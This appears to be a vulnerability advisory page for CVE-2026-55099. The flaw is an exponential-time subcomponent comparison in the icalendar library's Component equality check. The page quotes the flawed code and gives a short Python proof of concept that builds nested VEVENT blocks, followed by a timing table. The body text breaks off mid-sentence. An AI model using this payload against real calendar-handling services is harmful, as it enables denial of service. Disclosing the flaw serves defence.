CVE-2026-55099
Summary
Component.eq compares subcomponents in O(2^n) time relative to nesting depth. Because the parser accepts arbitrarily nested components, a sub-kilobyte .ics file is enough to make a single equality check run for minutes or hang indefinitely. Any application that compares parsed components (==, !=, in, set/dict membership, deduplication, test assertions) against attacker-supplied calendar data is exposed to denial of service.
Details
Component subclasses dict and stores children in a separate subcomponents list. eq (src/icalendar/cal/component.py:642-665) checks set-equivalence of children with two membership loops:
def eq(self, other):
if len(self.subcomponents) != len(other.subcomponents):
return False
if not super().eq(other):
return False
for subcomponent in self.subcomponents:
if subcomponent not in other.subcomponents:
return False
for subcomponent in other.subcomponents:
if subcomponent not in self.subcomponents:
return False
return True
Each ... not in ... test invokes eq on the children. For a nested chain, both loops descend the full subtree, so each level spawns two recursive comparisons: T(n) = 2·T(n-1) → O(2^n).
Parsing does not gate this. Component.from_ical builds the structure iteratively and imposes no depth limit, so BEGIN:VEVENT blocks can be nested to any depth (parsing the payload below is instant). The cost is paid only when a comparison occurs, and only when the operands are equal far enough down to keep both loops recursing, a condition the attacker controls by submitting equal subtrees.
PoC
from icalendar import Calendar
d = 26
event = b"BEGIN:VEVENT\r\n" * d + b"END:VEVENT\r\n" * d
ics = b"BEGIN:VCALENDAR\r\n" + event + event + b"END:VCALENDAR\r\n"
cal = Calendar.from_ical(ics)
a, b = cal.subcomponents
a == b
Measured on icalendar 7.1.x, CPython 3.14:
| Payload | Depth | == time |
|---|---|---|
| 552 B | 20 | 0.76 s |
| 656 B | 24 | 12 s |
| 708 B | 26 | 48 s |
| ~800 B | 30 | ~13 min |
A single uploaded file supplies bot
⚡ Watch CVE-2026-55099
Get an email if CVE-2026-55099 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.
Advisory coverage (2)
External references
Embed the live status
— this badge updates automatically when the KEV or exploit status changes. How to embed it →
[](https://www.csirts.com/cve/CVE-2026-55099)